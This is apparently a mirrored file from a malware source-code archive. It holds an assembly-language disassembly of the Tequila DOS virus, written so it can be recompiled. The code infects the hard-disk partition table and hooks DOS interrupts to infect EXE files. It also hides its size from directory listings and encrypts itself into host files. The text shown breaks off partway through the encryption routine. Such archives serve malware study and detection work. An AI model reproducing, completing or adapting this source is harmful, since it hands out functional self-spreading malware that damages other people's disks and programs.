mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
1089 lines
22 KiB
NASM
1089 lines
22 KiB
NASM
|
;=============================
|
|||
|
; the tequila virus =
|
|||
|
; a recompilable =
|
|||
|
; dis-assembly =
|
|||
|
; specifically designed =
|
|||
|
; for assembly to a COM file =
|
|||
|
; with the A86 assembler. =
|
|||
|
; ++++++++++++++++++ =
|
|||
|
; If you desire a "perfect" =
|
|||
|
; byte for byte source code =
|
|||
|
;match-up, the MASM assembler=
|
|||
|
; must be used and the noted =
|
|||
|
;instructions must be changed=
|
|||
|
; to comply with MASM syntax.=
|
|||
|
; In addition, all byte and =
|
|||
|
;word pointer references must=
|
|||
|
; be changed from B and W to =
|
|||
|
; BYTE POINTER and WORD =
|
|||
|
; POINTER. =
|
|||
|
;=============================
|
|||
|
|
|||
|
|
|||
|
CODE_SEG SEGMENT
|
|||
|
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
|
|||
|
ORG 0100
|
|||
|
TEQUILA PROC NEAR
|
|||
|
|
|||
|
JMP START
|
|||
|
|
|||
|
DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
|
|||
|
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
|
|||
|
|
|||
|
DB 00DH, 00AH, 00DH, 00AH
|
|||
|
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
|
|||
|
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
|
|||
|
DB "Switzerland.", 00DH, 00AH
|
|||
|
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
|
|||
|
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
|
|||
|
DB "$"
|
|||
|
|
|||
|
DB "Execute: mov ax, FE03 / int 21. Key to go on!"
|
|||
|
|
|||
|
|
|||
|
PROGRAM_TERMINATION_ROUTINE:
|
|||
|
PUSH BP
|
|||
|
MOV BP,SP
|
|||
|
SUB SP,0CH
|
|||
|
PUSH AX
|
|||
|
PUSH BX
|
|||
|
PUSH CX
|
|||
|
PUSH DX
|
|||
|
PUSH SI
|
|||
|
PUSH DI
|
|||
|
PUSH ES
|
|||
|
PUSH DS
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
MOV AX,W[6]
|
|||
|
INC AX
|
|||
|
JE 0243H ;Masm Mod. Needed
|
|||
|
DEC AX
|
|||
|
JNE 020DH ;Masm Mod. Needed
|
|||
|
DEC W[8] ;Masm Mod. Needed
|
|||
|
JNE 0243H ;Masm Mod. Needed
|
|||
|
JMP 0246H ;Masm Mod. Needed
|
|||
|
MOV AH,02AH
|
|||
|
CALL INT_21
|
|||
|
MOV SI,CX
|
|||
|
MOV CX,W[8]
|
|||
|
CMP CL,DL
|
|||
|
JNE 022FH ;Masm Mod. Needed
|
|||
|
MOV AX,SI
|
|||
|
SUB AX,W[6]
|
|||
|
MUL B[011H] ;Masm Mod. Needed
|
|||
|
ADD AL,DH
|
|||
|
ADD CH,3
|
|||
|
CMP AL,CH
|
|||
|
JAE 0237H ;Masm Mod. Needed
|
|||
|
MOV W[6],0FFFFH ;Masm Mod. Needed
|
|||
|
JMP 0243H ;Masm Mod. Needed
|
|||
|
MOV W[6],0 ;Masm Mod. Needed
|
|||
|
MOV W[8],3 ;Masm Mod. Needed
|
|||
|
JMP 02DF ;Masm Mod. Needed
|
|||
|
MOV BX,0B800H
|
|||
|
INT 011
|
|||
|
AND AX,030H
|
|||
|
CMP AX,030H
|
|||
|
JNE 0256H ;Masm Mod. Needed
|
|||
|
MOV BX,0B000H
|
|||
|
MOV ES,BX
|
|||
|
XOR BX,BX
|
|||
|
MOV DI,0FD8FH
|
|||
|
MOV SI,0FC18H
|
|||
|
MOV W[BP-2],SI
|
|||
|
MOV W[BP-4],DI
|
|||
|
MOV CX,01E
|
|||
|
MOV AX,W[BP-2]
|
|||
|
IMUL AX
|
|||
|
MOV W[BP-8],AX
|
|||
|
MOV W[BP-6],DX
|
|||
|
MOV AX,W[BP-4]
|
|||
|
IMUL AX
|
|||
|
MOV W[BP-0C],AX
|
|||
|
MOV W[BP-0A],DX
|
|||
|
ADD AX,W[BP-8]
|
|||
|
ADC DX,W[BP-6]
|
|||
|
CMP DX,0F
|
|||
|
JAE 02B0 ;Masm Mod. Needed
|
|||
|
MOV AX,W[BP-2]
|
|||
|
IMUL W[BP-4]
|
|||
|
IDIV W[0F] ;Masm Mod. Needed
|
|||
|
ADD AX,DI
|
|||
|
MOV W[BP-4],AX
|
|||
|
MOV AX,W[BP-8]
|
|||
|
MOV DX,W[BP-6]
|
|||
|
SUB AX,W[BP-0C]
|
|||
|
SBB DX,W[BP-0A]
|
|||
|
IDIV W[0D] ;Masm Mod. Needed
|
|||
|
ADD AX,SI
|
|||
|
MOV W[BP-2],AX
|
|||
|
LOOP 0269 ;Masm Mod. Needed
|
|||
|
INC CX
|
|||
|
SHR CL,1
|
|||
|
MOV CH,CL
|
|||
|
MOV CL,0DB
|
|||
|
ES MOV W[BX],CX ;Masm Mod. Needed
|
|||
|
INC BX
|
|||
|
INC BX
|
|||
|
ADD SI,012
|
|||
|
CMP SI,01B8
|
|||
|
JL 0260 ;Masm Mod. Needed
|
|||
|
ADD DI,034
|
|||
|
CMP DI,02A3
|
|||
|
JL 025D ;Masm Mod. Needed
|
|||
|
XOR DI,DI
|
|||
|
MOV SI,0BB
|
|||
|
MOV CX,02D
|
|||
|
CLD
|
|||
|
MOVSB
|
|||
|
INC DI
|
|||
|
LOOP 02D7 ;Masm Mod. Needed
|
|||
|
XOR AX,AX
|
|||
|
INT 016
|
|||
|
POP DS
|
|||
|
POP ES
|
|||
|
POP DI
|
|||
|
POP SI
|
|||
|
POP DX
|
|||
|
POP CX
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
MOV SP,BP
|
|||
|
POP BP
|
|||
|
RET
|
|||
|
|
|||
|
PRINT_MESSAGE:
|
|||
|
PUSH DX
|
|||
|
PUSH DS
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
MOV AH,9
|
|||
|
MOV DX,012
|
|||
|
CALL INT_21
|
|||
|
POP DS
|
|||
|
POP DX
|
|||
|
RET
|
|||
|
|
|||
|
NEW_PARTITION_TABLE:
|
|||
|
CLI
|
|||
|
XOR BX,BX
|
|||
|
MOV DS,BX
|
|||
|
MOV SS,BX
|
|||
|
MOV SP,07C00
|
|||
|
STI
|
|||
|
XOR DI,DI
|
|||
|
SUB W[0413],3 ;Masm Mod. Needed
|
|||
|
INT 012
|
|||
|
MOV CL,6
|
|||
|
SHL AX,CL
|
|||
|
MOV ES,AX
|
|||
|
PUSH ES
|
|||
|
MOV AX,022A
|
|||
|
PUSH AX
|
|||
|
MOV AX,0205
|
|||
|
MOV CX,W[07C30]
|
|||
|
INC CX
|
|||
|
MOV DX,W[07C32]
|
|||
|
INT 013
|
|||
|
RETF
|
|||
|
|
|||
|
DB 002, 0FE
|
|||
|
DB 04C, 0E9
|
|||
|
DB 080, 004
|
|||
|
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
XOR AX,AX
|
|||
|
MOV ES,AX
|
|||
|
MOV BX,07C00
|
|||
|
PUSH ES
|
|||
|
PUSH BX
|
|||
|
MOV AX,0201
|
|||
|
MOV CX,W[0226]
|
|||
|
MOV DX,W[0228]
|
|||
|
INT 013
|
|||
|
PUSH CS
|
|||
|
POP ES
|
|||
|
CLD
|
|||
|
MOV SI,0409
|
|||
|
MOV DI,09BE
|
|||
|
MOV CX,046
|
|||
|
REP MOVSB
|
|||
|
MOV SI,091B
|
|||
|
MOV DI,0A04
|
|||
|
MOV CX,045
|
|||
|
REP MOVSB
|
|||
|
CLI
|
|||
|
XOR AX,AX
|
|||
|
MOV ES,AX
|
|||
|
ES LES BX,[070] ;Masm Mod. Needed
|
|||
|
MOV W[09B0],BX ;Masm Mod. Needed
|
|||
|
MOV W[09B2],ES ;Masm Mod. Needed
|
|||
|
MOV ES,AX
|
|||
|
ES LES BX,[084] ;Masm Mod. Needed
|
|||
|
MOV W[09B4],BX ;Masm Mod. Needed
|
|||
|
MOV W[09B6],ES ;Masm Mod. Needed
|
|||
|
MOV ES,AX
|
|||
|
ES MOV W[070],044F ;Masm Mod. Needed
|
|||
|
ES MOV W[072],DS ;Masm Mod. Needed
|
|||
|
STI
|
|||
|
RETF
|
|||
|
|
|||
|
INSTALL:
|
|||
|
CALL NEXT_LINE
|
|||
|
NEXT_LINE:
|
|||
|
POP SI
|
|||
|
SUB SI,028F
|
|||
|
PUSH SI
|
|||
|
PUSH AX
|
|||
|
PUSH ES
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
MOV AX,ES
|
|||
|
ADD W[SI+2],AX
|
|||
|
ADD W[SI+4],AX
|
|||
|
DEC AX
|
|||
|
MOV ES,AX
|
|||
|
MOV AX,0FE02
|
|||
|
INT 021
|
|||
|
CMP AX,01FD
|
|||
|
JE NO_PARTITION_INFECTION
|
|||
|
ES CMP B[0],05A ;Masm Mod. Needed
|
|||
|
JNE NO_PARTITION_INFECTION
|
|||
|
ES CMP W[3],0BB ;Masm Mod. Needed
|
|||
|
JBE NO_PARTITION_INFECTION
|
|||
|
ES MOV AX,W[012] ;Masm Mod. Needed
|
|||
|
SUB AX,0BB
|
|||
|
MOV ES,AX
|
|||
|
XOR DI,DI
|
|||
|
MOV CX,09A4
|
|||
|
CLD
|
|||
|
REP MOVSB
|
|||
|
PUSH ES
|
|||
|
POP DS
|
|||
|
CALL INFECT_PARTITION_TABLE
|
|||
|
NO_PARTITION_INFECTION:
|
|||
|
POP ES
|
|||
|
POP AX
|
|||
|
PUSH ES
|
|||
|
POP DS
|
|||
|
POP SI
|
|||
|
CS MOV SS,W[SI+4] ;Masm Mod. Needed
|
|||
|
CHAIN_TO_THE_HOST_FILE:
|
|||
|
CS JMP D[SI] ;Masm Mod. Needed
|
|||
|
|
|||
|
INFECT_PARTITION_TABLE:
|
|||
|
MOV AH,02A
|
|||
|
INT 021
|
|||
|
MOV W[6],CX ;Masm Mod. Needed
|
|||
|
MOV W[8],DX ;Masm Mod. Needed
|
|||
|
MOV AH,052
|
|||
|
INT 021
|
|||
|
ES MOV AX,W[BX-2] ;Masm Mod. Needed
|
|||
|
MOV W[03E8],AX ;Masm Mod. Needed
|
|||
|
MOV AX,03513
|
|||
|
INT 021
|
|||
|
MOV W[09A0],BX ;Masm Mod. Needed
|
|||
|
MOV W[09A2],ES ;Masm Mod. Needed
|
|||
|
MOV AX,03501
|
|||
|
INT 021
|
|||
|
MOV SI,BX
|
|||
|
MOV DI,ES
|
|||
|
MOV AX,02501
|
|||
|
MOV DX,03DA
|
|||
|
INT 021
|
|||
|
MOV B[0A],0 ;Masm Mod. Needed
|
|||
|
PUSHF
|
|||
|
POP AX
|
|||
|
OR AX,0100
|
|||
|
PUSH AX
|
|||
|
POPF
|
|||
|
MOV AX,0201
|
|||
|
MOV BX,09A4
|
|||
|
MOV CX,1
|
|||
|
MOV DX,080
|
|||
|
PUSH DS
|
|||
|
POP ES
|
|||
|
PUSHF
|
|||
|
CALL D[09A0] ;Masm Mod. Needed
|
|||
|
PUSHF
|
|||
|
POP AX
|
|||
|
AND AX,0FEFF
|
|||
|
PUSH AX
|
|||
|
POPF
|
|||
|
PUSHF
|
|||
|
MOV AX,02501
|
|||
|
MOV DX,SI
|
|||
|
MOV DS,DI
|
|||
|
INT 021
|
|||
|
POPF
|
|||
|
JAE 0450 ;Masm Mod. Needed
|
|||
|
JMP RET ;Masm Mod. Needed
|
|||
|
PUSH ES
|
|||
|
POP DS
|
|||
|
CMP W[BX+02E],0FE02
|
|||
|
JNE 045C ;Masm Mod. Needed
|
|||
|
JMP RET ;Masm Mod. Needed
|
|||
|
ADD BX,01BE
|
|||
|
MOV CX,4
|
|||
|
MOV AL,B[BX+4]
|
|||
|
CMP AL,4
|
|||
|
JE 0479 ;Masm Mod. Needed
|
|||
|
CMP AL,6
|
|||
|
JE 0479 ;Masm Mod. Needed
|
|||
|
CMP AL,1
|
|||
|
JE 0479 ;Masm Mod. Needed
|
|||
|
ADD BX,010
|
|||
|
LOOP 0463 ;Masm Mod. Needed
|
|||
|
JMP SHORT RET ;Masm Mod. Needed
|
|||
|
MOV DL,080
|
|||
|
MOV DH,B[BX+5]
|
|||
|
MOV W[0228],DX ;Masm Mod. Needed
|
|||
|
MOV AX,W[BX+6]
|
|||
|
MOV CX,AX
|
|||
|
MOV SI,6
|
|||
|
AND AX,03F
|
|||
|
CMP AX,SI
|
|||
|
JBE RET ;Masm Mod. Needed
|
|||
|
SUB CX,SI
|
|||
|
MOV DI,BX
|
|||
|
INC CX
|
|||
|
MOV W[0226],CX ;Masm Mod. Needed
|
|||
|
MOV AX,0301
|
|||
|
MOV BX,09A4
|
|||
|
PUSHF
|
|||
|
CALL D[09A0] ;Masm Mod. Needed
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
DEC CX
|
|||
|
MOV W[DI+6],CX
|
|||
|
INC CX
|
|||
|
SUB W[DI+0C],SI
|
|||
|
SBB W[DI+0E],0
|
|||
|
MOV AX,0305
|
|||
|
MOV BX,0
|
|||
|
INC CX
|
|||
|
PUSHF
|
|||
|
CALL D[09A0] ;Masm Mod. Needed
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
MOV SI,01F6
|
|||
|
MOV DI,09A4
|
|||
|
MOV CX,034
|
|||
|
CLD
|
|||
|
REP MOVSB
|
|||
|
MOV AX,0301
|
|||
|
MOV BX,09A4
|
|||
|
MOV CX,1
|
|||
|
XOR DH,DH
|
|||
|
PUSHF
|
|||
|
CALL D[09A0] ;Masm Mod. Needed
|
|||
|
RET
|
|||
|
|
|||
|
NEW_INTERRUPT_ONE:
|
|||
|
PUSH BP
|
|||
|
MOV BP,SP
|
|||
|
CS CMP B[0A],1 ;Masm Mod. Needed
|
|||
|
JE 0506 ;Masm Mod. Needed
|
|||
|
CMP W[BP+4],09B4
|
|||
|
JA 050B ;Masm Mod. Needed
|
|||
|
PUSH AX
|
|||
|
PUSH ES
|
|||
|
LES AX,[BP+2]
|
|||
|
CS MOV W[09A0],AX ;Masm Mod. Needed
|
|||
|
CS MOV W[09A2],ES ;Masm Mod. Needed
|
|||
|
CS MOV B[0A],1
|
|||
|
POP ES
|
|||
|
POP AX
|
|||
|
AND W[BP+6],0FEFF
|
|||
|
POP BP
|
|||
|
IRET
|
|||
|
|
|||
|
NEW_INTERRUPT_13:
|
|||
|
CMP CX,1
|
|||
|
JNE 054E ;Masm Mod. Needed
|
|||
|
CMP DX,080
|
|||
|
JNE 054E ;Masm Mod. Needed
|
|||
|
CMP AH,3
|
|||
|
JA 054E ;Masm Mod. Needed
|
|||
|
CMP AH,2
|
|||
|
JB 054E ;Masm Mod. Needed
|
|||
|
PUSH CX
|
|||
|
PUSH DX
|
|||
|
DEC AL
|
|||
|
JE 0537 ;Masm Mod. Needed
|
|||
|
PUSH AX
|
|||
|
PUSH BX
|
|||
|
ADD BX,0200
|
|||
|
INC CX
|
|||
|
PUSHF
|
|||
|
CS CALL D[09A0] ;Masm Mod. Needed
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
MOV AL,1
|
|||
|
CS MOV CX,W[0226] ;Masm Mod. Needed
|
|||
|
CS MOV DX,W[0228] ;Masm Mod. Needed
|
|||
|
PUSHF
|
|||
|
CS CALL D[09A0] ;Masm Mod. Needed
|
|||
|
POP DX
|
|||
|
POP CX
|
|||
|
RETF 2
|
|||
|
CS JMP D[09A0] ;Masm Mod. Needed
|
|||
|
|
|||
|
NEW_TIMER_TICK_INTERRUPT:
|
|||
|
PUSH AX
|
|||
|
PUSH BX
|
|||
|
PUSH ES
|
|||
|
PUSH DS
|
|||
|
XOR AX,AX
|
|||
|
MOV ES,AX
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
ES LES BX,[084] ;Masm Mod. Needed
|
|||
|
MOV AX,ES
|
|||
|
CMP AX,0800
|
|||
|
JA 05B0 ;Masm Mod. Needed
|
|||
|
CMP AX,W[09B6]
|
|||
|
JNE 0575 ;Masm Mod. Needed
|
|||
|
CMP BX,W[09B4]
|
|||
|
JE 05B0 ;Masm Mod. Needed
|
|||
|
MOV W[09B4],BX ;Masm Mod. Needed
|
|||
|
MOV W[09B6],ES ;Masm Mod. Needed
|
|||
|
XOR AX,AX
|
|||
|
MOV DS,AX
|
|||
|
CS LES BX,[09B0] ;Masm Mod. Needed
|
|||
|
MOV W[070],BX ;Masm Mod. Needed
|
|||
|
MOV W[072],ES ;Masm Mod. Needed
|
|||
|
LES BX,[04C] ;Masm Mod. Needed
|
|||
|
CS MOV W[09A0],BX ;Masm Mod. Needed
|
|||
|
CS MOV W[09A2],ES ;Masm Mod. Needed
|
|||
|
MOV W[04C],09BE ;Masm Mod. Needed
|
|||
|
MOV W[04E],CS ;Masm Mod. Needed
|
|||
|
MOV W[084],04B1 ;Masm Mod. Needed
|
|||
|
MOV W[086],CS ;Masm Mod. Needed
|
|||
|
POP DS
|
|||
|
POP ES
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
IRET
|
|||
|
|
|||
|
INT_21_INTERCEPT:
|
|||
|
CMP AH,011
|
|||
|
JB CHECK_FOR_HANDLE
|
|||
|
CMP AH,012
|
|||
|
JA CHECK_FOR_HANDLE
|
|||
|
CALL ADJUST_FCB_MATCHES
|
|||
|
RETF 2
|
|||
|
CHECK_FOR_HANDLE:
|
|||
|
CMP AH,04E
|
|||
|
JB CHECK_FOR_PREVIOUS_INSTALLATION
|
|||
|
CMP AH,04F
|
|||
|
JA CHECK_FOR_PREVIOUS_INSTALLATION
|
|||
|
CALL ADJUST_HANDLE_MATCHES
|
|||
|
RETF 2
|
|||
|
CHECK_FOR_PREVIOUS_INSTALLATION:
|
|||
|
CMP AX,0FE02
|
|||
|
JNE CHECK_FOR_MESSAGE_PRINT
|
|||
|
NOT AX
|
|||
|
IRET
|
|||
|
CHECK_FOR_MESSAGE_PRINT:
|
|||
|
CMP AX,0FE03
|
|||
|
JNE CHECK_FOR_EXECUTE
|
|||
|
CS CMP W[6],0 ;Masm Mod. Needed
|
|||
|
JNE CHAIN_TO_TRUE_INT_21
|
|||
|
CALL PRINT_MESSAGE
|
|||
|
IRET
|
|||
|
CHECK_FOR_EXECUTE:
|
|||
|
CMP AX,04B00
|
|||
|
JE SET_STACK
|
|||
|
CMP AH,04C
|
|||
|
JNE CHAIN_TO_TRUE_INT_21
|
|||
|
SET_STACK:
|
|||
|
CS MOV W[09A6],SP ;Masm Mod. Needed
|
|||
|
CS MOV W[09A8],SS ;Masm Mod. Needed
|
|||
|
CLI
|
|||
|
PUSH CS
|
|||
|
POP SS
|
|||
|
MOV SP,0AE5
|
|||
|
STI
|
|||
|
CMP AH,04C
|
|||
|
JNE TO_AN_INFECTION
|
|||
|
CALL PROGRAM_TERMINATION_ROUTINE
|
|||
|
JMP SHORT NO_INFECTION
|
|||
|
TO_AN_INFECTION:
|
|||
|
CALL INFECT_THE_FILE
|
|||
|
NO_INFECTION:
|
|||
|
CLI
|
|||
|
CS MOV SS,W[09A8] ;Masm Mod. Needed
|
|||
|
CS MOV SP,W[09A6] ;Masm Mod. Needed
|
|||
|
STI
|
|||
|
JMP SHORT CHAIN_TO_TRUE_INT_21
|
|||
|
CHAIN_TO_TRUE_INT_21:
|
|||
|
CS INC W[09BC] ;Masm Mod. Needed
|
|||
|
CS JMP D[09B4] ;Masm Mod. Needed
|
|||
|
|
|||
|
NEW_CRITICAL_ERROR_HANDLER:
|
|||
|
MOV AL,3
|
|||
|
IRET
|
|||
|
|
|||
|
ADJUST_FCB_MATCHES:
|
|||
|
PUSH BX
|
|||
|
PUSH ES
|
|||
|
PUSH AX
|
|||
|
MOV AH,02F
|
|||
|
CALL INT_21
|
|||
|
POP AX
|
|||
|
PUSHF
|
|||
|
CS CALL D[09B4] ;Masm Mod. Needed
|
|||
|
PUSHF
|
|||
|
PUSH AX
|
|||
|
CMP AL,0FF
|
|||
|
JE 0664 ;Masm Mod. Needed
|
|||
|
ES CMP B[BX],0FF ;Masm Mod. Needed
|
|||
|
JNE 064F ;Masm Mod. Needed
|
|||
|
ADD BX,7
|
|||
|
ES MOV AL,B[BX+017] ;Masm Mod. Needed
|
|||
|
AND AL,01F
|
|||
|
CMP AL,01F
|
|||
|
JNE 0664 ;Masm Mod. Needed
|
|||
|
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
|
|||
|
ES SBB W[BX+01F],0 ;Masm Mod. Needed
|
|||
|
POP AX
|
|||
|
POPF
|
|||
|
POP ES
|
|||
|
POP BX
|
|||
|
RET
|
|||
|
|
|||
|
ADJUST_HANDLE_MATCHES:
|
|||
|
PUSH BX
|
|||
|
PUSH ES
|
|||
|
PUSH AX
|
|||
|
MOV AH,02F
|
|||
|
CALL INT_21
|
|||
|
POP AX
|
|||
|
PUSHF
|
|||
|
CS CALL D[09B4] ;Masm Mod. Needed
|
|||
|
PUSHF
|
|||
|
PUSH AX
|
|||
|
JB 0691 ;Masm Mod. Needed
|
|||
|
ES MOV AL,B[BX+016] ;Masm Mod. Needed
|
|||
|
AND AL,01F
|
|||
|
CMP AL,01F
|
|||
|
JNE 0691 ;Masm Mod. Needed
|
|||
|
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
|
|||
|
ES SBB W[BX+01C],0 ;Masm Mod. Needed
|
|||
|
POP AX
|
|||
|
POPF
|
|||
|
POP ES
|
|||
|
POP BX
|
|||
|
RET
|
|||
|
|
|||
|
WRITE_TO_THE_FILE:
|
|||
|
MOV AH,040
|
|||
|
JMP 069C ;Masm Mod. Needed
|
|||
|
|
|||
|
READ_FROM_THE_FILE:
|
|||
|
MOV AH,03F
|
|||
|
CALL 06B4 ;Masm Mod. Needed
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
SUB AX,CX
|
|||
|
RET
|
|||
|
|
|||
|
MOVE_TO_END_OF_FILE:
|
|||
|
XOR CX,CX
|
|||
|
XOR DX,DX
|
|||
|
MOV AX,04202
|
|||
|
JMP 06B4 ;Masm Mod. Needed
|
|||
|
|
|||
|
MOVE_TO_BEGINNING_OF_FILE:
|
|||
|
XOR CX,CX
|
|||
|
XOR DX,DX
|
|||
|
MOV AX,04200
|
|||
|
CS MOV BX,W[09A4] ;Masm Mod. Needed
|
|||
|
|
|||
|
INT_21:
|
|||
|
CLI
|
|||
|
PUSHF
|
|||
|
CS CALL D[09B4] ;Masm Mod. Needed
|
|||
|
RET
|
|||
|
|
|||
|
INFECT_THE_FILE:
|
|||
|
PUSH AX
|
|||
|
PUSH BX
|
|||
|
PUSH CX
|
|||
|
PUSH DX
|
|||
|
PUSH SI
|
|||
|
PUSH DI
|
|||
|
PUSH ES
|
|||
|
PUSH DS
|
|||
|
CALL CHECK_LETTERS_IN_FILENAME
|
|||
|
JAE GOOD_NAME
|
|||
|
JMP BAD_NAME
|
|||
|
|
|||
|
GOOD_NAME:
|
|||
|
PUSH DX
|
|||
|
PUSH DS
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
|
|||
|
SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
|
|||
|
MOV AX,03524
|
|||
|
CALL INT_21
|
|||
|
MOV W[09B8],BX ;Masm Mod. Needed
|
|||
|
MOV W[09BA],ES ;Masm Mod. Needed
|
|||
|
MOV AX,02524
|
|||
|
MOV DX,052A
|
|||
|
CALL INT_21
|
|||
|
POP DS
|
|||
|
POP DX
|
|||
|
|
|||
|
SAVE_AND_REPLACE_FILE_ATTRIBUTE:
|
|||
|
MOV AX,04300
|
|||
|
CALL INT_21
|
|||
|
CS MOV W[09AA],CX ;Masm Mod. Needed
|
|||
|
JAE 06FE ;Masm Mod. Needed
|
|||
|
JMP RESTORE_CRIT_HANDLER
|
|||
|
MOV AX,04301
|
|||
|
XOR CX,CX
|
|||
|
CALL INT_21
|
|||
|
JB 077C ;Masm Mod. Needed
|
|||
|
|
|||
|
OPEN_FILE_FOR_READ_WRITE:
|
|||
|
MOV AX,03D02
|
|||
|
CALL INT_21
|
|||
|
JB 0771 ;Masm Mod. Needed
|
|||
|
PUSH DX
|
|||
|
PUSH DS
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
MOV W[09A4],AX ;Masm Mod. Needed
|
|||
|
|
|||
|
GET_FILEDATE:
|
|||
|
MOV AX,05700
|
|||
|
CALL 06B4 ;Masm Mod. Needed
|
|||
|
JB 075C ;Masm Mod. Needed
|
|||
|
MOV W[09AC],DX ;Masm Mod. Needed
|
|||
|
MOV W[09AE],CX ;Masm Mod. Needed
|
|||
|
|
|||
|
READ_AND_CHECK_EXE_HEADER:
|
|||
|
CALL 06AD ;Masm Mod. Needed
|
|||
|
MOV DX,0A49
|
|||
|
MOV CX,01C
|
|||
|
CALL 069A ;Masm Mod. Needed
|
|||
|
JB 075C ;Masm Mod. Needed
|
|||
|
PUSH DS
|
|||
|
POP ES
|
|||
|
MOV DI,0E8
|
|||
|
MOV CX,020
|
|||
|
CMP W[0A49],05A4D ;Masm Mod. Needed
|
|||
|
JNE 075C ;Masm Mod. Needed
|
|||
|
MOV AX,W[0A5B]
|
|||
|
CLD
|
|||
|
REPNE SCASW
|
|||
|
JNE 0754 ;Masm Mod. Needed
|
|||
|
OR W[09AE],01F ;Masm Mod. Needed
|
|||
|
JMP 075C ;Masm Mod. Needed
|
|||
|
CALL READ_PAST_END_OF_FILE
|
|||
|
JB 075C ;Masm Mod. Needed
|
|||
|
CALL ENCRYPT_AND_WRITE_TO_FILE
|
|||
|
|
|||
|
RESTORE_ALTERED_DATE:
|
|||
|
MOV AX,05701
|
|||
|
MOV DX,W[09AC]
|
|||
|
MOV CX,W[09AE]
|
|||
|
CALL 06B4 ;Masm Mod. Needed
|
|||
|
|
|||
|
CLOSE_THE_FILE:
|
|||
|
MOV AH,03E
|
|||
|
CALL 06B4 ;Masm Mod. Needed
|
|||
|
|
|||
|
RESTORE_FILE_ATTRIBUTE:
|
|||
|
POP DS
|
|||
|
POP DX
|
|||
|
MOV AX,04301
|
|||
|
CS MOV CX,W[09AA] ;Masm Mod. Needed
|
|||
|
CALL INT_21
|
|||
|
|
|||
|
RESTORE_CRIT_HANDLER:
|
|||
|
MOV AX,02524
|
|||
|
CS LDS DX,[09B8] ;Masm Mod. Needed
|
|||
|
CALL INT_21
|
|||
|
|
|||
|
BAD_NAME:
|
|||
|
POP DS
|
|||
|
POP ES
|
|||
|
POP DI
|
|||
|
POP SI
|
|||
|
POP DX
|
|||
|
POP CX
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
RET
|
|||
|
|
|||
|
CHECK_LETTERS_IN_FILENAME:
|
|||
|
PUSH DS
|
|||
|
POP ES
|
|||
|
MOV DI,DX
|
|||
|
MOV CX,-1
|
|||
|
XOR AL,AL
|
|||
|
CLD
|
|||
|
REPNE SCASB
|
|||
|
NOT CX
|
|||
|
MOV DI,DX
|
|||
|
MOV AX,04353
|
|||
|
MOV SI,CX
|
|||
|
SCASW
|
|||
|
JE 07B7 ;Masm Mod. Needed
|
|||
|
DEC DI
|
|||
|
LOOP 07A5 ;Masm Mod. Needed
|
|||
|
MOV CX,SI
|
|||
|
MOV DI,DX
|
|||
|
MOV AL,056
|
|||
|
REPNE SCASB
|
|||
|
JE 07B7 ;Masm Mod. Needed
|
|||
|
CLC
|
|||
|
RET
|
|||
|
STC
|
|||
|
RET
|
|||
|
|
|||
|
READ_PAST_END_OF_FILE:
|
|||
|
MOV CX,-1
|
|||
|
MOV DX,-0A
|
|||
|
CALL 06A8 ;Masm Mod. Needed
|
|||
|
MOV DX,0A65
|
|||
|
MOV CX,8
|
|||
|
CALL 069A ;Masm Mod. Needed
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
CMP W[0A65],0FDF0 ;Masm Mod. Needed
|
|||
|
JNE 07F0 ;Masm Mod. Needed
|
|||
|
CMP W[0A67],0AAC5 ;Masm Mod. Needed
|
|||
|
JNE 07F0 ;Masm Mod. Needed
|
|||
|
MOV CX,-1
|
|||
|
MOV DX,-9
|
|||
|
CALL 06A8 ;Masm Mod. Needed
|
|||
|
MOV DX,0A6B
|
|||
|
MOV CX,4
|
|||
|
CALL 0696 ;Masm Mod. Needed
|
|||
|
RET
|
|||
|
CLC
|
|||
|
RET
|
|||
|
|
|||
|
ENCRYPT_AND_WRITE_TO_FILE:
|
|||
|
CALL MOVE_TO_END_OF_FILE
|
|||
|
MOV SI,AX
|
|||
|
MOV DI,DX
|
|||
|
MOV BX,0A49
|
|||
|
MOV AX,W[BX+4]
|
|||
|
MUL W[0D] ;Masm Mod. Needed
|
|||
|
SUB AX,SI
|
|||
|
SBB DX,DI
|
|||
|
JAE 080C ;Masm Mod. Needed
|
|||
|
JMP OUT_OF_ENCRYPT
|
|||
|
MOV AX,W[BX+8]
|
|||
|
MUL W[0B] ;Masm Mod. Needed
|
|||
|
SUB SI,AX
|
|||
|
SBB DI,DX
|
|||
|
MOV AX,W[BX+0E]
|
|||
|
MOV W[4],AX ;Masm Mod. Needed
|
|||
|
ADD W[4],010 ;Masm Mod. Needed
|
|||
|
MUL W[0B] ;Masm Mod. Needed
|
|||
|
ADD AX,W[BX+010]
|
|||
|
SUB AX,SI
|
|||
|
SBB DX,DI
|
|||
|
JB 083C ;Masm Mod. Needed
|
|||
|
SUB AX,080
|
|||
|
SBB DX,0
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
ADD W[BX+0E],09B
|
|||
|
MOV AX,W[BX+016]
|
|||
|
ADD AX,010
|
|||
|
